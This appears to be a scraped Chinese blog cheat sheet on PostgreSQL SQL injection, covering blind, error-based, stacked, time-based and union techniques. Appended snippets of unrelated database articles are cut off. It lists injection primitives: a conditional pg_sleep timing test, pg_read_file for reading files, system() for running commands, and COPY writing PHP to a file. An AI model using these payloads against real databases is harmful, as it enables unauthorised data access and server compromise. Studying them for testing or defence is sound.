目錄
postgresql
postgresql常用查詢命令
布林盲注
錯誤注入
堆疊注入
時間盲注
聯合查詢
postgresql是一種特性非常齊全的自由軟體的物件-關係型資料庫管理系統(ordbms),4.2版本為基礎的物件關係型資料庫管理系統。
postgresql安裝後,預設的埠是:5432,預設的使用者名稱是: postgres ,預設的資料庫也是:postgres 。注釋符:-- 延時函式:pg_sleep(3)
postgresql和mysql一樣,也有 information_schema 資料庫。
postgresql安裝後預設是不允許其他主機連線的,如果要讓其他主機連線,找到postgresql安裝目錄下的/data/pg_hba.conf, 找到「# ipv4 local connections:」,然後在下面新增你的ip位址
select current_schema() #檢視當前許可權select
user #檢視使用者
select
current_user #檢視當前使用者
select
chr(
97) #將
ascii碼轉為字元
select
chr(
97)||
chr(
100)||
chr(
109)||
chr(
105)||
chr(
110) #將
ascii轉換為字串
select
session_user;
select usename
from pg_user;
select getpgusername();
select
version() #檢視postgresql資料庫版本
select current_database() #檢視當前資料庫
select
length(
'admin') #檢視長度
select
case
when(expr1)
then result1
else result2
end; #如果xx,執行result1,否則result2
例:select
case
when(
current_user=
'postgres')
then pg_sleep(
5) else pg_sleep(
0) end;
select pg_read_file(filepath+filename); #讀取檔案
select
system(
"comamnd_string"); #執行系統命令
copy (
select
'<?php phpinfo();?>')
to'/tmp/1.php'; #寫入檔案
報錯注入需要目標**開啟了報錯提示。
和mysql的堆疊注入一樣,在後面加上查詢語句即可。
by3#檢視顯示列
select
null,
null,函式
然後接下來就是和mysql注入一樣了,關於postgresql的語句可以檢視sqlmap
更多語句檢視sqlmap
目錄
PostgreSQL 資料庫的命令
系統命令行視窗 查詢退出 q 備註root izuf624rjpfgj95cg9aw9fz su postgres postgres izuf624rjpfgj95cg9aw9fz postgres izuf624rjpfgj95cg9aw9fz psql postgres postgres l p...
postgresql模板資料庫
template0和template1為postgresql資料庫的模板資料庫,新建的資料庫預設使用template1作為模板。template0和template1的區別在於template0無法修改,因此你可以修改template1資料庫以定製新建立的資料庫。template資料庫無法被刪除 d...
postgresql資料庫安裝
安裝並初始化 1 解壓資料庫並放到指定目錄 在opt目錄下 tar xvzf postgresql 10.1 1 linux x64 binaries.tar.gz 解壓出來之後目錄為pgsql 2 mv pgsql usr local pgsql 3 建立pgsql使用者並設定密碼 useradd...